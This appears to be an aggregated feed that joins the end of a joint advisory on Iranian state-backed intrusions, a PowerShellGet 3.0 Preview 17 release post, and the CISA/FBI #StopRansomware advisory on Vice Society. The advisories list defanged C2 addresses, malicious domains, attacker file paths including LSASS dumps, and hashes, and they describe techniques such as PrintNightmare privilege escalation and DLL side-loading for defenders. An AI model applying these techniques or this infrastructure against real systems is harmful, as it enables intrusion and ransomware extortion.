  • The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for more information and how to report information securely.
  • For more information on malicious cyber activity affiliated with the Iranian government- sponsored malicious cyber activity, see us-cert.cisa.gov/Iran and FBI’s Iran Threat page.
  • For information and resources on protecting against and responding to ransomware or extortion activity, refer to StopRansomware.gov, the U.S. centralized, whole-of-government webpage providing ransomware resources and alerts.
  • The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: Technical Approaches to Uncovering and Remediating Malicious Activity provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.
  • CISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess, identify, and reduce their exposure to threats. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate malicious activity.
  • ACSC can provide tailored cyber security advice and assistance, reporting, and incident response support at cyber.gov.au and via 1300 292 371 (1300 CYBER1).

PURPOSE

This advisory was developed by U.S., Australian, Canadian, and UK cybersecurity authorities in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI, CISA, NSA, USCC-CNMF, DoT, ACSC, CCCS, and NCSC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.

APPENDIX A: INDICATORS OF COMPROMISE

IP addresses and executables files are listed below. For a downloadable copy of IOCs, see AA22- 257A.stix.

IP Addresses

  • 54.39.78[.]148
  • 95.217.193[.]86
  • 104.168.117[.]149
  • 107.173.231[.]114
  • 144.76.186[.]88
  • 148.251.71[.]182
  • 172.245.26[.]118
  • 185.141.212[.]131
  • 198.12.65[.]175
  • 198.144.189[.]74

Note: Some of these observed IP addresses may be outdated. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.

Malicious Domains

  • newdesk[.]top
  • symantecserver[.]co
  • msupdate[.]us
  • msupdate[.]top
  • gupdate[.]us
  • aptmirror[.]eu
  • buylap[.]top
  • winstore[.]us
  • tcp443[.]org
  • mssync[.]one
  • upmirror[.]top
  • tcp443 (subdomain)
  • kcp53 (subdomain)

Files

Malicious files observed in this activity are identified in Table 1. Many of the below malicious files are masquerading as legitimate Windows files; therefore, file names alone should not be treated as an indicator of compromise. Note: For additional malicious files observed, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.

Filename:

Wininet[.]xml

Path:

C:WindowsTempwininet[.]xml

MD5:

d2f4647a3749d30a35d5a8faff41765e

SHA-1:

0f676bc786db3c44cac4d2d22070fb514b4cb64c

SHA-256:

559d4abe3a6f6c93fc9eae24672a49781af140c43d491a757c8e975507b4032e

Filename:

Wininet’[.]xml

MD5:

2e1e17a443dc713f13f45a9646fc2179

SHA-1:

e75bfc0dd779d9d8ac02798b090989c2f95850dc

Filename:

WinLogon[.]xml

Path:

C:WindowsTempWinLogon[.]xml

MD5:

49c71178fa212012d710f11a0e6d1a30

SHA-1:

226f0fbb80f7a061947c982ccf33ad65ac03280f

SHA-256:

bcc2e4d96e7418a85509382df6609ec9a53b3805effb7ddaed093bdaf949b6ea

Filename:

Wininet[.]bat

Path:

C:Windowswininet[.]bat

MD5:

5f098b55f94f5a448ca28904a57c0e58

SHA-1:

27102b416ef5df186bd8b35190c2a4cc4e2fbf37

SHA-256:

668ec78916bab79e707dc99fdecfa10f3c87ee36d4dee6e3502d1f5663a428a0

Filename:

Winlogon[.]bat

Path:

C:Windowswinlogon[.]bat

MD5:

7ac4633bf064ebba9666581b776c548f

SHA-1:

524443dd226173d8ba458133b0a4084a172393ef

SHA-256:

d14d546070afda086a1c7166eaafd9347a15a32e6be6d5d029064bfa9ecdede7

Filename:

CacheTask[.]bat

Path:

C:ProgramDataMicrosoftCacheTask[.]bat

MD5:

ee8fd6c565254fe55a104e67cf33eaea

SHA-1:

24ed561a1ddbecd170acf1797723e5d3c51c2f5d

SHA-256:

c1723fcad56a7f18562d14ff7a1f030191ad61cd4c44ea2b04ad57a7eb5e2837

Filename:

Task_update[.]exe

Path:

C:WindowsTemptask_update[.]exe

MD5:

cacb64bdf648444e66c82f5ce61caf4b

SHA-1:

3a6431169073d61748829c31a9da29123dd61da8

SHA-256:

12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075ff6d1a

Filename:

Task[.]exe

MD5:

5b646edb1deb6396082b214a1d93691b

SHA-1:

763ca462b2e9821697e63aa48a1734b10d3765ee

SHA-256:

17e95ecc7fedcf03c4a5e97317cfac166b337288562db0095ccd24243a93592f

Filename:

dllhost[.]exe

Path:

C:Windowsdllhost[.]exe

MD5:

0f8b592126cc2be0e9967d21c40806bc

9a3703f9c532ae2ec3025840fa449d4e

SHA-1:

3da45558d8098eb41ed7db5115af5a2c6 1c543af

8ece87086e8b5aba0d1cc4ec3804bf74e 0b45bee

SHA-256:

724d54971c0bba8ff32aeb6044d3b3fd57 1b13a4c19cada015ea4bcab30cae26

1604e69d17c0f26182a3e3ff65694a4945

0aafd56a7e8b21697a932409dfd81e

Filename:

svchost[.]exe

Path:

C:Windowssvchost[.]exe

MD5:

68f58e442fba50b02130eedfc5fe4e5b

298d41f01009c6d6240bc2dc7b769205

SHA-1:

76dd6560782b13af3f44286483e157848

efc0a4e

6ca62f4244994b5fbb8a46bdfe62aa1c95 8cebbd

SHA-256:

b04b97e7431925097b3ca4841b894139 7b0b88796da512986327ff66426544ca

8aa3530540ba023fb29550643beb00c9c 29f81780056e02c5a0d02a1797b9cd9

Filename:

User[.]exe

Path:

C:WindowsTempuser[.]exe

MD5:

bd131ebfc44025a708575587afeebbf3

f0be699c8aafc41b25a8fc0974cc4582

SHA-1:

8b23b14d8ec4712734a5f6261aed40942 c9e0f68

6bae2d45bbd8c4b0a59ba08892692fe86 e596154

SHA-256:

b8a472f219658a28556bab4d6d109fdf3 433b5233a765084c70214c973becbbd

7b5fbbd90eab5bee6f3c25aa3c2762104 e219f96501ad6a4463e25e6001eb00b

Filename:

Setup[.]bat

Path:

C:UsersDefaultAccountDesktopNew foldersetup[.]bat

MD5:

7fdc2d007ef0c1946f1f637b87f81590

Filename:

Ssasl[.]pmd

Path:

C:WindowsTempssasl[.]pmd

Filename:

Ssasl[.]zip

Path:

C:WindowsTempssasl[.]zip

Filename:

netscanold[.]exe

Path:

C:UsersDefaultAccountDesktopnetscanoldnetscanold[.]exe

Filename:

scan[.]csv

Path:

C:UsersDefaultAccountDesktopscan[.]csv

Filename:

lsass[.]dmp

Path:

C:UsersDefaultAccountAppDataLocalTemplsass[.]dmp

Filename:

lsass[.]zip

Path:

C:UsersDefaultAccountAppDataLocalTemplsass[.]zip

 

APPENDIX B: MITRE ATT&CK TACTICS AND TECHNIQUES

Table 2 identifies MITRE ATT&CK Tactics and techniques observed in this activity.

 

Table 2: Observed Tactics and Techniques

Tactic

Technique

Resource Development ]TA0042]

Obtain Capabilities: Malware [T1588.001]

Obtain Capabilities: Tool [T1588.002]

Initial Access [TA0001]

Exploit Public-Facing Application [T1190]

Execution [TA0002]

Scheduled Task/Job: Scheduled Task [T1053.005]

Persistence [TA0003]

Create Account: Local Account [T1136.001]

Create Account: Domain Account [T1136.002]

Privilege Escalation [TA0004]

 

Credential Access [TA0006]

 

Collection [TA0009]

Archive Collected Data: Archive via Utility [T1560.001]

Exfiltration [TA0010]

 

Impact [TA0040]

Data Encrypted for Impact [T1486]

Revisions

  • September 14, 2022: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

PowerShellGet 3.0 Preview 17

This post was originally published on this site

We are excited to announce that an update to our preview of PowerShellGet 3.0 is now available on the PowerShell Gallery!

This release includes a number of bug fixes as well as support for specifying the temporary path used during installation of PSResources.

How to Install PowerShellGet 3.0 Preview 17

Prerequisites

Please note that this preview release of PowerShellGet 3.0 does not support PowerShell 7.0, 7.1 or 7.2-preview1.

This is a temporary issue due to a dependency and should be resolved in future releases. This release does support Windows PowerShell 5.1, PowerShell 7.2 and 7.3-previews.

Please ensure that you have the latest (non-prerelease) version of PowerShellGet and PackageManagement installed. To check the version you currently have installed run the command Get-InstalledModule PowerShellGet, PackageManagement

The latest version of PowerShellGet is 2.2.5, and the latest version of PackageManagement is 1.4.7. To install the latest versions of these modules run the following: Install-Module PowerShellGet -Force -AllowClobber

Installing the Preview

To install this preview release side-by-side with your existing PowerShellGet version, open any PowerShell console and run: Install-Module PowerShellGet -Force -AllowPrerelease

If you have PowershellGet v3 already you can run Update-PSResource PowerShellGet -Prerelease

What to expect in this update

This release includes a number of bug fixes as well as additional support for specifying a temporary path for installation of PSResources. For additional context on scenarios where this may be useful please refer to this issue.

Features of this release

  • Add -TemporaryPath parameter to Install-PSResource, Save-PSResource, and Update-PSResource
  • Add String and SecureString as credential types in PSCredentialInfo
  • Expand acceptable paths for Publish-PSResource (Module root directory, module manifest file, script file)
  • Add -Force parameter to Register-PSResourceRepository cmdlet, to override an existing repository
  • Add a warning for when the script installation path is not in Path variable

Bug Fixes

  • Change casing of -IncludeXML to -IncludeXml
  • Update priority range for PSResourceRepository to 0-100
  • Editorial pass on cmdlet reference
  • Fix issue when PSScriptInfo has no empty lines
  • Make ConfirmImpact low for Register-PSResourceRepository and Save-PSResource
  • Fix -PassThru for Set-PSResourceRepository cmdlet to return all properties
  • Rename -FilePath parameter to -Path for PSScriptFileInfo cmdlets
  • Fix RequiredModules description and add Find example to docs
  • Remove unneeded inheritance in InstallHelper.cs
  • Make -Path a required parameter for Save-PSResource cmdlet
  • Improve script validation for publishing and installing

Features to Expect in Coming Preview Releases

This module is not yet complete. The focus for our next preview release is removing the dependency on the nuget APIs. This will allow us to resolve dependency loading issues that effect which versions of PowerShell this module will be compatible with. This update will also allow us to improve performance of the module and resolve a number of outstanding bugs that are due to limitations in the nuget APIs. For the full list of issues for our next preview release please refer to our GitHub project.

How to Track the Development of this Module

GitHub is the best place to track the bugs/feature requests related to this module. We have used a combination of projects and labels on our GitHub repo to track issues for this upcoming release. We are using the label Resolved-3.0 to label issues that we plan to release at some point before we release the module as GA (generally available).

To track issues/features for the next release, please refer to this GitHub project.

Timeline/Road Map

Expect to see preview releases as new functionality is added and bug fixes are made. User feedback will help us determine when we can have a Release Candidate version of the module which will be supported to be used in production. Based on user feedback, if we believe the 3.0 release is complete, then we will publish a 3.0 version of the module as Generally Available. Since these milestones are driven by quality, rather than date, we can not offer an exact timeline at this point.

How to Give feedback and Get Support

We cannot overstate how critical user feedback is at this stage in the development of the module. Feedback from preview releases help inform design decisions without incurring a breaking change once generally available and used in production.

In order to help us to make key decisions around the behavior of the module please give us feedback by opening issues in our GitHub repository.

Sydney Smith

PowerShell Team

The post PowerShellGet 3.0 Preview 17 appeared first on PowerShell Team.

AA22-249A: #StopRansomware: Vice Society

This post was originally published on this site

Original release date: September 6, 2022

Summary

Actions to take today to mitigate cyber threats from ransomware:

• Prioritize and remediate known exploited vulnerabilities.
• Train users to recognize and report phishing attempts.
• Enable and enforce multifactor authentication.

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate IOCs and TTPs associated with Vice Society actors identified through FBI investigations as recently as September 2022. The FBI, CISA, and the MS-ISAC have recently observed Vice Society actors disproportionately targeting the education sector with ransomware attacks.

Over the past several years, the education sector, especially kindergarten through twelfth grade (K-12) institutions, have been a frequent target of ransomware attacks. Impacts from these attacks have ranged from restricted access to networks and data, delayed exams, canceled school days, and unauthorized access to and theft of personal information regarding students and staff. The FBI, CISA, and the MS-ISAC anticipate attacks may increase as the 2022/2023 school year begins and criminal ransomware groups perceive opportunities for successful attacks. School districts with limited cybersecurity capabilities and constrained resources are often the most vulnerable; however, the opportunistic targeting often seen with cyber criminals can still put school districts with robust cybersecurity programs at risk. K-12 institutions may be seen as particularly lucrative targets due to the amount of sensitive student data accessible through school systems or their managed service providers.

The FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.

Technical Details

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 11. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.

Vice Society is an intrusion, exfiltration, and extortion hacking group that first appeared in summer 2021. Vice Society actors do not use a ransomware variant of unique origin. Instead, the actors have deployed versions of Hello Kitty/Five Hands and Zeppelin ransomware, but may deploy other variants in the future.

Vice Society actors likely obtain initial network access through compromised credentials by exploiting internet-facing applications [T1190]. Prior to deploying ransomware, the actors spend time exploring the network, identifying opportunities to increase accesses, and exfiltrating data [TA0010] for double extortion–a tactic whereby actors threaten to publicly release sensitive data unless a victim pays a ransom. Vice Society actors have been observed using a variety of tools, including SystemBC, PowerShell Empire, and Cobalt Strike to move laterally. They have also used “living off the land” techniques targeting the legitimate Windows Management Instrumentation (WMI) service [T1047] and tainting shared content [T1080].

Vice Society actors have been observed exploiting the PrintNightmare vulnerability (CVE-2021-1675 and CVE-2021-34527 ) to escalate privileges [T1068]. To maintain persistence, the criminal actors have been observed leveraging scheduled tasks [T1053], creating undocumented autostart Registry keys [T1547.001], and pointing legitimate services to their custom malicious dynamic link libraries (DLLs) through a tactic known as DLL side-loading [T1574.002]. Vice Society actors attempt to evade detection through masquerading their malware and tools as legitimate files [T1036], using process injection [T1055], and likely use evasion techniques to defeat automated dynamic analysis [T1497]. Vice Society actors have been observed escalating privileges, then gaining access to domain administrator accounts, and running scripts to change the passwords of victims’ network accounts to prevent the victim from remediating. 

Indicators of Compromise (IOCs)

Email Addresses

v-society.official@onionmail[.]org

ViceSociety@onionmail[.]org

OnionMail email accounts in the format of [First Name][Last Name]@onionmail[.]org

 

TOR Address

http://vsociethok6sbprvevl4dlwbqrzyhxcxaqpvcqt5belwvsuxaxsutyad[.]onion

 

IP Addresses for C2

Confidence Level

5.255.99[.]59

High Confidence

5.161.136[.]176

Medium Confidence

198.252.98[.]184

Medium Confidence

194.34.246[.]90

Low Confidence

See Table 1 for file hashes obtained from FBI incident response investigations in September 2022.

Table 1: File Hashes as of September 2022

MD5

SHA1

fb91e471cfa246beb9618e1689f1ae1d

a0ee0761602470e24bcea5f403e8d1e8bfa29832

 

3122ea585623531df2e860e7d0df0f25cce39b21

 

41dc0ba220f30c70aea019de214eccd650bc6f37

 

c9c2b6a5b930392b98f132f5395d54947391cb79

MITRE ATT&CK TECHNIQUES

Vice Society actors have used ATT&CK techniques, similar to Zeppelin techniques, listed in Table 2.

Table 2: Vice Society Actors ATT&CK Techniques for Enterprise

Initial Access

Technique Title

ID

Use

Exploit Public-Facing Application

T1190

Vice Society actors exploit vulnerabilities in an internet-facing systems to gain access to victims’ networks.

Valid Accounts

T1078

Vice Society actors obtain initial network access through compromised valid accounts.

Execution

Technique Title

ID

Use

Windows Management Instrumentation (WMI)

T1047

Vice Society actors leverage WMI as a means of “living off the land” to execute malicious commands. WMI is a native Windows administration feature.

Scheduled Task/Job

T1053

Vice Society have used malicious files that create component task schedule objects, which are often mean to register a specific task to autostart on system boot. This facilitates recurring execution of their code.

Persistence

Technique Title

ID

Use

Modify System Process

T1543.003

Vice Society actors encrypt Windows Operating functions to preserve compromised system functions.

Registry Run Keys/Startup Folder

T1547.001

Vice Society actors have employed malicious files that create an undocumented autostart Registry key to maintain persistence after boot/reboot.

DLL Side-Loading

T1574.002

Vice Society actors may directly side-load their payloads by planting their own DLL then invoking a legitimate application that executes the payload within that DLL. This serves as both a persistence mechanism and a means to masquerade actions under legitimate programs.

Privilege Escalation

Technique Title

ID

Use

Exploitation for Privilege Escalation

T1068

Vice Society actors have been observed exploiting PrintNightmare vulnerability (CVE-2021-1675 and CVE-2021-34527) to escalate privileges.

Defense Evasion

Technique Title

ID

Use

Masquerading

T1036

Vice Society actors may attempt to manipulate features of the files they drop in a victim’s environment to mask the files or make the files appear legitimate.

Process Injection

T1055

Vice Society artifacts have been analyzed to reveal the ability to inject code into legitimate processes for evading process-based defenses. This tactic has other potential impacts, including the ability to escalate privileges or gain additional accesses.

Sandbox Evasion

T1497

Vice Society actors may have included sleep techniques in their files to hinder common reverse engineering or dynamic analysis.

Lateral Movement

Technique Title

ID

Use

Taint Shared Content

T1080

Vice Society actors may deliver payloads to remote systems by adding content to shared storage locations such as network drives.

Exfiltration

Technique Title

ID

Use

Exfiltration

TA0010

Vice Society actors are known for double extortion, which is a second attempt to force a victim to pay by threatening to expose sensitive information if the victim does not pay a ransom.

Impact

Technique Title

ID

Use

Data Encrypted for Impact

T1486

Vice Society actors have encrypted data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.

Account Access Removal

T1531

Vice Society actors run a script to change passwords of victims’ email accounts.

 

 

Mitigations

The FBI and CISA recommend organizations, particularly the education sector, establish and maintain strong liaison relationships with the FBI Field Office in their region and their regional CISA Cybersecurity Advisor. The location and contact information for FBI Field Offices and CISA Regional Offices can be located at www.fbi.gov/contact-us/field-offices and www.cisa.gov/cisa-regions, respectively. Through these partnerships, the FBI and CISA can assist with identifying vulnerabilities to academia and mitigating potential threat activity. The FBI and CISA further recommend that academic entities review and, if needed, update incident response and communication plans that list actions an organization will take if impacted by a cyber incident.

The FBI, CISA, and the MS-ISAC recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Vice Society actors:

Preparing for Cyber Incidents

  • Maintain offline backups of data, and regularly maintain backup and restoration.  By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.
  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure. Ensure your backup data is not already infected.
  • Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.
  • Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established security policy.
  • Document and monitor external remote connections. Organizations should document approved solutions for remote management and maintenance, and immediately investigate if an unapproved solution is installed on a workstation.
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).

Identity and Access Management

  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute of Standards and Technology (NIST) standards for developing and managing password policies.
    • Use longer passwords consisting of at least 8 characters and no more than 64 characters in length;
    • Store passwords in hashed format using industry-recognized password managers;
    • Add password user “salts” to shared login credentials;
    • Avoid reusing passwords;
    • Implement multiple failed login attempt account lockouts;
    • Disable password “hints”;
    • Refrain from requiring password changes more frequently than once per year unless a password is known or suspected to be compromised.
      Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
    • Require administrator credentials to install software.
  • Require phishing-resistant multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.
  • Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
  • Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege. 
  • Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.

Protective Controls and Architecture

  • Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
  • Install, regularly update, and enable real time detection for antivirus software on all hosts.
  • Secure and closely monitor remote desktop protocol (RDP) use.
    • Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. If RDP is deemed operationally necessary, restrict the originating sources and require MFA to mitigate credential theft and reuse. If RDP must be available externally, use a VPN, virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices. Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.

Vulnerability and Configuration Management

  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should prioritize patching of vulnerabilities on CISA’s Known Exploited Vulnerabilities catalog.
  • Disable unused ports.
  • Consider adding an email banner to emails received from outside your organization.
  • Disable hyperlinks in received emails.
  • Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.
  • Ensure devices are properly configured and that security features are enabled.
  • Disable ports and protocols that are not being used for a business purpose (e.g., RDP Transmission Control Protocol Port 3389).
  • Restrict Server Message Block (SMB) Protocol within the network to only access servers that are necessary, and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.

REFERENCES

REPORTING

The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Vice Society actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

The FBI, CISA, and the MS-ISAC strongly discourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, or to CISA at report@cisa.gov or (888) 282-0870. SLTT government entities can also report to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and the MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, or the MS-ISAC.

Revisions

  • September 6, 2022: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.